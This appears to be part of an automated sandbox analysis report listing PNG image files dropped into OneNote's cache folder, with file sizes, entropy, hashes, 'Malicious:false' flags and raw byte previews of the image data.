                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000037.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000039.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003C.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003E.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003G.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
